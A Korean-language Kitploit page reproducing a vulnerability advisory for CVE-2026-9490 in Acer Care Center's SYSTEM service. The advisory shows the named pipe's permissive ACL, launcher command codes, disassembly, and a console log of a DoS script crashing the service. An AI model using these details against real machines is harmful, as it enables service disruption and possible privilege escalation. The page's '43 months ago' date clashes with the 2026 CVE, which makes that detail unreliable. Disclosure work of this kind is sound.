Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ugvxb/cve-2026-9490
Privilege EscalationVulnerability AnalysisExploitationReverse EngineeringPenetration TestingBinary Analysis
GitHubugvxb/cve-2026-9490

CVE-2026-9490

ACCSvc 서비스는 약한 보안 설명자(Security Descriptor)를 가진 Named Pipe를 생성하여 인증된 모든 사용자가 연결하고 메시지를 보낼 수 있게 합니다. 특수하게 조작된 메시지(메시지 유형 0x03)가 파이프로 전송되면 서비스는 종료 코드 1067(ERROR_PROCESS_ABORTED)과 함께 충돌합니다.

저장소 보기
43개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE ID: CVE-2026-9490
연구자: Vo Duc Thang (ugvxb)
공식 인정: https://community.acer.com/en/kb/articles/19668

1. 요약

Acer Care Center 서비스(ACCSvc.exe)에서 심각한 보안 취약점이 확인되었습니다. 이 취약점으로 인해 인증된 모든 로컬 사용자가 보안이 취약한 Named Pipe 인터페이스를 통해 시스템 서비스를 중단(서비스 거부)시키고 잠재적으로 권한을 상승시킬 수 있습니다.

SYSTEM 권한(LocalSystem)으로 실행되는 이 서비스는 모든 인증된 사용자에게 읽기, 쓰기, 실행 권한을 부여하는 과도하게 허용적인 액세스 제어가 적용된 Named Pipe를 노출합니다.


2. 취약점 세부 정보

2.1 영향을 받는 구성 요소

속성값
제품Acer Care Center
구성 요소ACCSvc.exe (ACC 서비스)
서비스 이름ACCSvc
설치 경로C:\Program Files (x86)\Acer\Care Center\
서비스 계정LocalSystem (NT AUTHORITY\SYSTEM)
시작 유형AUTO_START
Named Pipe\.\pipe\treadstone_service_LightMode

2.2 취약점 #1: 서비스 거부(DoS)

설명

ACCSvc 서비스는 인증된 모든 사용자가 연결하고 메시지를 전송할 수 있도록 허용하는 취약한 보안 설명자(Security Descriptor)로 Named Pipe를 생성합니다. 특수하게 조작된 메시지(메시지 유형 0x03)가 파이프로 전송되면 서비스는 종료 코드 1067(ERROR_PROCESS_ABORTED)과 함께 중단됩니다.

보안 설명자(SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

SDDL 분석

영향

특별한 권한이 없는 일반 사용자가 ACCSvc 시스템 서비스를 종료하여 Acer Care Center 기능을 사용할 수 없게 만들 수 있습니다.

2.3 취약점 #2: 잠재적 로컬 권한 상승

설명

동일한 취약한 Named Pipe ACL로 인해 인증된 사용자가 CreateProcessAsUserW를 통해 서비스가 런처 애플리케이션을 실행하도록 트리거하는 명령 메시지를 전송할 수 있습니다.

명령 코드

명령16진수 값대상 실행 파일
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. 기술 분석

3.1 바이너리 분석

속성값
파일ACCSvc.exe
유형PE32+ 실행 파일(콘솔) x86-64
분석 도구Radare2
진입점0x14000fd4c

3.2 식별된 주요 함수

3.3 Named Pipe 생성 매개변수

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 명령 디스패치 로직

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. 악용 결과

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

결과: 일반 사용자가 SYSTEM 서비스를 성공적으로 중단시켰습니다!


5. 위험 평가

5.1 CVSS v4.0 점수

지표값
CVSS 4.0 벡터AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
CVSS 기본 점수6.8 (중간)

5.2 CWE 분류

CWE ID이름
CWE-269부적절한 권한 관리

6. 면책 조항

이 PoC는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 작성자는 오용에 대해 책임을 지지 않습니다. 승인되지 않은 악용은 불법입니다.

도구 다운로드
ACE보안 주체권한평가
(D;OICI;GA;;;BG)Builtin 게스트모두 거부안전
(D;OICI;GA;;;AN)익명 사용자모두 거부안전
(A;OICI;GRGWGX;;;AU)인증된 사용자읽기/쓰기/실행취약
(A;OICI;GA;;;BA)Builtin 관리자모두 허용예상됨
함수주소용도
fcn.140009a700x140009a70CreateNamedPipeW - 취약한 파이프 생성
fcn.1400075700x140007570CreateProcessAsUserW - 프로세스 생성
fcn.14000a8a00x14000a8a0ReadFile 핸들러
fcn.1400099500x140009950WriteFile 핸들러
fcn.1400080500x140008050메시지 디스패처